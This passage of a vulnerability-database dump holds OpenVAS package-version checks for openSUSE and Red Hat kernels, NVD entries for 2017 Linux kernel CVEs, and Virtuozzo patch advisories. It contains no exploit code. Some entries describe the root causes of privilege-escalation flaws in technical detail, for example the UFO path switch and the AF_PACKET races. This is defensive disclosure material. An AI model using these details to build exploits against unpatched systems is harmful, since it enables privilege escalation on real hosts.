rpm:\"kernel-debug-base~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build\", rpm:\"kernel-obs-build~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build-debugsource\", rpm:\"kernel-obs-build-debugsource~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa\", rpm:\"kernel-obs-qa~4.4.79~18.26.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~4.4.79~18.26.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base-debuginfo\", rpm:\"kernel-vanilla-base-debuginfo~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~4.4.79~18.26.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.4.79~18.26.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~4.4.79~18.26.3\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-html\", rpm:\"kernel-docs-html~4.4.79~18.26.3\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-pdf\", rpm:\"kernel-docs-pdf~4.4.79~18.26.3\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~4.4.79~18.26.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~4.4.79~18.26.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~4.4.79~18.26.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:53", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-11-16T00:00:00", "id": "OPENVAS:1361412562310812095", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812095", "title": "RedHat Update for kernel RHSA-2017:3200-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_3200-01_kernel.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for kernel RHSA-2017:3200-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812095\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-16 07:27:48 +0100 (Thu, 16 Nov 2017)\");\n script_cve_id(\"CVE-2017-14106\", \"CVE-2017-1000111\", \"CVE-2017-1000112\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2017:3200-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * A race condition issue leading to a use-after-free flaw was found in the\nway the raw packet sockets are implemented in the Linux kernel networking\nsubsystem handling synchronization. A local user able to open a raw packet\nsocket (requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system. (CVE-2017-1000111, Important)\n\n * An exploitable memory corruption flaw was found in the Linux kernel. The\nappend path can be erroneously switched from UFO to non-UFO in\nip_ufo_append_data() when building an UFO packet with MSG_MORE option. If\nunprivileged user namespaces are available, this flaw can be exploited to\ngain root privileges. (CVE-2017-1000112, Important)\n\n * A divide-by-zero vulnerability was found in the __tcp_select_window\nfunction in the Linux kernel. This can result in a kernel panic causing a\nlocal denial of service. (CVE-2017-14106, Moderate)\n\nRed Hat would like to thank Willem de Bruijn for reporting CVE-2017-1000111\nand Andrey Konovalov for reporting CVE-2017-1000112.\n\nBug Fix(es):\n\n * When the operating system was booted with Red Hat Enterprise\nVirtualization, and the eh_deadline sysfs parameter was set to 10s, the\nStorage Area Network (SAN) issues caused eh_deadline to trigger with no\nhandler. Consequently, a kernel panic occurred. This update fixes the lpfc\ndriver, thus preventing the kernel panic under described circumstances.\n(BZ#1487220)\n\n * When an NFS server returned the NFS4ERR_BAD_SEQID error to an OPEN\nrequest, the open-owner was removed from the state_owners rbtree.\nConsequently, NFS4 client infinite loop that required a reboot to recover\noccurred. This update changes NFS4ERR_BAD_SEQID handling to leave the\nopen-owner in the state_owners rbtree by updating the create_time parameter\nso that it looks like a new open-owner. As a result, an NFS4 client is now\nable to recover without falling into the infinite recovery loop after\nreceiving NFS4ERR_BAD_SEQID. (BZ#1491123)\n\n * If an NFS client attempted to mount NFSv3 shares from an NFS server\nexported directly to the client's IP address, and this NFS client had\nalready mounted other shares that originated from the same server but were\nexported to the subnetwork which this client was part of, the auth.unix.ip\ncache expiration was not handled correctly. Consequently, the client\nreceived the 'stale file handle' errors when trying to mount the share.\nThis update fixes handling of the ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"kernel on\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:3200-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-November/msg00020.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~696.16.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~696.16.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.32~696.16.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~696.16.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.32~696.16.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~2.6.32~696.16.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~696.16.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~696.16.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~696.16.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~2.6.32~696.16.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~2.6.32~696.16.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~696.16.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~696.16.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~696.16.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~2.6.32~696.16.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-05-29T18:16:48", "bulletinFamily": "NVD", "description": "arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5, when nested virtualisation is used, does not properly traverse guest pagetable entries to resolve a guest virtual address, which allows L1 guest OS users to execute arbitrary code on the host OS or cause a denial of service (incorrect index during page walking, and host OS crash), aka an \"MMU potential stack buffer overrun.\"", "modified": "2018-03-08T02:29:00", "id": "CVE-2017-12188", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12188", "published": "2017-10-11T15:29:00", "title": "CVE-2017-12188", "type": "cve", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:16:50", "bulletinFamily": "NVD", "description": "The sg_ioctl function in drivers/scsi/sg.c in the Linux kernel before 4.13.4 allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for /dev/sg0.", "modified": "2018-08-24T10:29:00", "id": "CVE-2017-14991", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14991", "published": "2017-10-04T01:29:00", "title": "CVE-2017-14991", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:16:48", "bulletinFamily": "NVD", "description": "The keyctl_read_key function in security/keys/keyctl.c in the Key Management subcomponent in the Linux kernel before 4.13.5 does not properly consider that a key may be possessed but negatively instantiated, which allows local users to cause a denial of service (OOPS and system crash) via a crafted KEYCTL_READ operation.", "modified": "2018-03-16T01:29:00", "id": "CVE-2017-12192", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12192", "published": "2017-10-12T00:29:00", "title": "CVE-2017-12192", "type": "cve", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-10-04T12:18:45", "bulletinFamily": "NVD", "description": "Linux kernel: heap out-of-bounds in AF_PACKET sockets. This new issue is analogous to previously disclosed CVE-2016-8655. In both cases, a socket option that changes socket state may race with safety checks in packet_set_ring. Previously with PACKET_VERSION. This time with PACKET_RESERVE. The solution is similar: lock the socket for the update. This issue may be exploitable, we did not investigate further. As this issue affects PF_PACKET sockets, it requires CAP_NET_RAW in the process namespace. But note that with user namespaces enabled, any process can create a namespace in which it has CAP_NET_RAW.", "modified": "2019-10-03T00:03:00", "id": "CVE-2017-1000111", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000111", "published": "2017-10-05T01:29:00", "title": "CVE-2017-1000111", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:16:50", "bulletinFamily": "NVD", "description": "Race condition in the ALSA subsystem in the Linux kernel before 4.13.8 allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted /dev/snd/seq ioctl calls, related to sound/core/seq/seq_clientmgr.c and sound/core/seq/seq_ports.c.", "modified": "2019-04-23T19:29:00", "id": "CVE-2017-15265", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15265", "published": "2017-10-16T18:29:00", "title": "CVE-2017-15265", "type": "cve", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T15:02:37", "bulletinFamily": "NVD", "description": "Linux kernel: Exploitable memory corruption due to UFO to non-UFO path switch. When building a UFO packet with MSG_MORE __ip_append_data() calls ip_ufo_append_data() to append. However in between two send() calls, the append path can be switched from UFO to non-UFO one, which leads to a memory corruption. In case UFO packet lengths exceeds MTU, copy = maxfraglen - skb->len becomes negative on the non-UFO path and the branch to allocate new skb is taken. This triggers fragmentation and computation of fraggap = skb_prev->len - maxfraglen. Fraggap can exceed MTU, causing copy = datalen - transhdrlen - fraggap to become negative. Subsequently skb_copy_and_csum_bits() writes out-of-bounds. A similar issue is present in IPv6 code. The bug was introduced in e89e9cf539a2 (\"[IPv4/IPv6]: UFO Scatter-gather approach\") on Oct 18 2005.", "modified": "2018-08-06T01:29:00", "id": "CVE-2017-1000112", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000112", "published": "2017-10-05T01:29:00", "title": "CVE-2017-1000112", "type": "cve", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Race condition in net/packet/af_packet.c in the Linux kernel through 4.8.12 allows local users to gain privileges or cause a denial of service (use-after-free) by leveraging the CAP_NET_RAW capability to change a socket version, related to the packet_set_ring and packet_setsockopt functions.", "modified": "2018-05-25T01:29:00", "id": "CVE-2016-8655", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8655", "published": "2016-12-08T08:59:00", "title": "CVE-2016-8655", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-01T10:37:43", "bulletinFamily": "NVD", "description": "security/keys/keyctl.c in the Linux kernel before 4.11.5 does not consider the case of a NULL payload in conjunction with a nonzero length value, which allows local users to cause a denial of service (NULL pointer dereference and OOPS) via a crafted add_key or keyctl system call, a different vulnerability than CVE-2017-12192.", "modified": "2018-03-16T01:29:00", "id": "CVE-2017-15274", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15274", "published": "2017-10-12T00:29:00", "title": "CVE-2017-15274", "type": "cve", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:16:54", "bulletinFamily": "NVD", "description": "net/packet/af_packet.c in the Linux kernel before 4.13.6 allows local users to gain privileges via crafted system calls that trigger mishandling of packet_fanout data structures, because of a race condition (involving fanout_add and packet_do_bind) that leads to a use-after-free, a different vulnerability than CVE-2017-6346.", "modified": "2018-08-24T10:29:00", "id": "CVE-2017-15649", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15649", "published": "2017-10-19T22:29:00", "title": "CVE-2017-15649", "type": "cve", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:17:08", "bulletinFamily": "NVD", "description": "Race condition in net/packet/af_packet.c in the Linux kernel before 4.9.13 allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via a multithreaded application that makes PACKET_FANOUT setsockopt system calls.", "modified": "2017-11-04T01:29:00", "id": "CVE-2017-6346", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6346", "published": "2017-03-01T20:59:00", "title": "CVE-2017-6346", "type": "cve", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:27:54", "bulletinFamily": "unix", "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernel 3.10.0-514.26.1.vz7.33.22 (Virtuozzo 7.0.5).\n**Vulnerability id:** CVE-2017-1000111\nA race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets are implemented in the Linux kernel networking subsystem handling synchronization. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system.\n\n**Vulnerability id:** CVE-2017-1000112\nAndrey Konovalov discovered a race condition in the UDP Fragmentation Offload (UFO) code in the Linux kernel. A local attacker could use this to cause a denial of service or execute arbitrary code.\n\n", "modified": "2017-08-18T00:00:00", "published": "2017-08-18T00:00:00", "id": "VZA-2017-073", "href": "https://help.virtuozzo.com/customer/portal/articles/2860787", "title": "Important kernel security update: CVE-2017-1000111 and other; Virtuozzo ReadyKernel patch 29.1 for Virtuozzo 7.0.5", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:27:52", "bulletinFamily": "unix", "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-514.16.1.vz7.30.10 (Virtuozzo 7.0.4) and 3.10.0-514.16.1.vz7.30.15 (Virtuozzo 7.0.4 HF3).\n**Vulnerability id:** CVE-2017-1000111\nA race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets are implemented in the Linux kernel networking subsystem handling synchronization. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system.\n\n**Vulnerability id:** CVE-2017-1000112\nAndrey Konovalov discovered a race condition in the UDP Fragmentation Offload (UFO) code in the Linux kernel. A local attacker could use this to cause a denial of service or execute arbitrary code.\n\n", "modified": "2017-08-17T00:00:00", "published": "2017-08-17T00:00:00", "id": "VZA-2017-072", "href": "https://help.virtuozzo.com/customer/portal/articles/2860785", "title": "Important kernel security update: CVE-2017-1000111 and other; Virtuozzo ReadyKernel patch 29.0 for Virtuozzo 7.0.4 and 7.0.4 HF3", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:27:51", "bulletinFamily": "unix", "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.36.1.vz7.18.7 (Virtuozzo 7.0.1), and 3.10.0-327.36.1.vz7.20.18 (Virtuozzo 7.0.3).\n**Vulnerability id:** CVE-2017-1000111\nA race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets are implemented in the Linux kernel networking subsystem handling synchronization. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system.\n\n**Vulnerability id:** CVE-2017-1000112\nAndrey Konovalov discovered a race condition in the UDP Fragmentation Offload (UFO) code in the Linux kernel. A local attacker could use this to cause a denial of service or execute arbitrary code.\n\n", "modified": "2017-08-17T00:00:00", "published": "2017-08-17T00:00:00", "id": "VZA-2017-071", "href": "https://help.virtuozzo.com/customer/portal/articles/2860784", "title": "Important kernel security update: CVE-2017-1000111 and other; Virtuozzo ReadyKernel patch 29.0 for Virtuozzo 7.0.0, 7.0.1, and 7.0.3", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:27:51", "bulletinFamily": "unix", "description": "The cumulative Virtuozzo ReadyKernel patch was updated with a security fix. The patch applies to Virtuozzo kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.36.1.vz7.18.7 (Virtuozzo 7.0.1), 3.10.0-327.36.1.vz7.20.18 (Virtuozzo 7.0.3), 3.10.0-514.16.1.vz7.30.10 (Virtuozzo 7.0.4), 3.10.0-514.16.1.vz7.30.15 (Virtuozzo 7.0.4 HF3), and 3.10.0-514.26.1.vz7.33.22 (Virtuozzo 7.0.5).\n**Vulnerability id:** CVE-2017-15274\nA flaw was discovered in the key management subsystem of the Linux kernel. It allowed to pass NULL payload with non-zero payload length as parameters to sys_add_key() and the KEYCTL_UPDATE operation of sys_keyctl(). A local unprivileged user could exploit this to cause a kernel crash (NULL pointer dereference).\n\n", "modified": "2017-10-16T00:00:00", "published": "2017-10-16T00:00:00", "id": "VZA-2017-094", "href": "https://help.virtuozzo.com/customer/portal/articles/2889936", "title": "Kernel security update: CVE-2017-15274; Virtuozzo ReadyKernel patch 34.0 for Virtuozzo 7.0.x", "type": "virtuozzo", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-05T11:28:21", "bulletinFamily": "unix", "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.36.1.vz7.18.7 (Virtuozzo 7.0.1), 3.10.0-327.36.1.vz7.20.18 (Virtuozzo 7.0.3).\n**Vulnerability id:** CVE-2017-15649\nIt was found that fanout_add() in 'net/packet/af_packet.c' in the Linux kernel, before version 4.13.6, allows local users to gain privileges via crafted system calls that trigger mishandling of packet_fanout data structures, because of a race condition (involving fanout_add and packet_do_bind) that leads to a use-after-free bug.\n\n", "modified": "2017-10-30T00:00:00", "published": "2017-10-30T00:00:00", "id": "VZA-2017-099", "href": "https://help.virtuozzo.com/customer/portal/articles/2896650", "title": "Important kernel security update: CVE-2017-15649; Virtuozzo ReadyKernel patch 36.1 for Virtuozzo 7.0.0, 7.0.1, and 7.0.3", "type": "virtuozzo", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-05T11:27:42", "bulletinFamily": "unix", "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-514.16.1.vz7.30.10 (Virtuozzo 7.0.4), 3.10.0-514.16.1.vz7.30.15 (Virtuozzo 7.0.4 HF3), and 3.10.0-514.26.1.vz7.33.22 (Virtuozzo 7.0.5).\n**Vulnerability id:** CVE-2017-15649\nIt was found that fanout_add() in 'net/packet/af_packet.c' in the Linux kernel, before version 4.13.6, allows local users to gain privileges via crafted system calls that trigger mishandling of packet_fanout data structures, because of a race condition (involving fanout_add and packet_do_bind) that leads to a use-after-free bug.\n\n", "modified": "2017-10-30T00:00:00", "published": "2017-10-30T00:00:00", "id": "VZA-2017-100", "href": "https://help.virtuozzo.com/customer/portal/articles/2896651", "title": "Important kernel security update: CVE-2017-15649; Virtuozzo ReadyKernel patch 36.1 for Virtuozzo 7.0.4, 7.0.4 HF3, and 7.0.5", "type": "virtuozzo", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-05T11:27:44", "bulletinFamily": "unix", "description": "This update provides a new Virtuozzo Containers for Linux 4.7 and Server Bare Metal 5.0 kernel 2.6.32-042stab126.1 based on the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.16.1.el6. The new kernel inherits several non-security bugfixes from the RHEL kernel (as we have already fixed the security ones) and introduces new security and stability fixes.\n**Vulnerability id:** CVE-2017-15265\nA use-after-free vulnerability was found when issuing an ioctl to a sound device. This could allow a user to exploit a race condition and create memory corruption or possibly privilege escalation.\n\n", "modified": "2017-11-20T00:00:00", "published": "2017-11-20T00:00:00", "id": "VZA-2017-106", "href": "https://help.virtuozzo.com/customer/portal/articles/2904977", "title": "Kernel security update: CVE-2017-15265; new kernel 2.6.32-042stab126.1 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0", "type": "virtuozzo", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:27:52", "bulletinFamily": "unix", "description": "This update provides a new Virtuozzo 6.0 kernel 2.6.32-042stab126.1 based on the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.16.1.el6. The new kernel inherits several non-security bugfixes from the RHEL kernel (as we have already fixed the security ones) and introduces new security and stability fixes.\n**Vulnerability id:** CVE-2017-15265\nA use-after-free vulnerability was found when issuing an ioctl to a sound device. This could allow a user to exploit a race condition 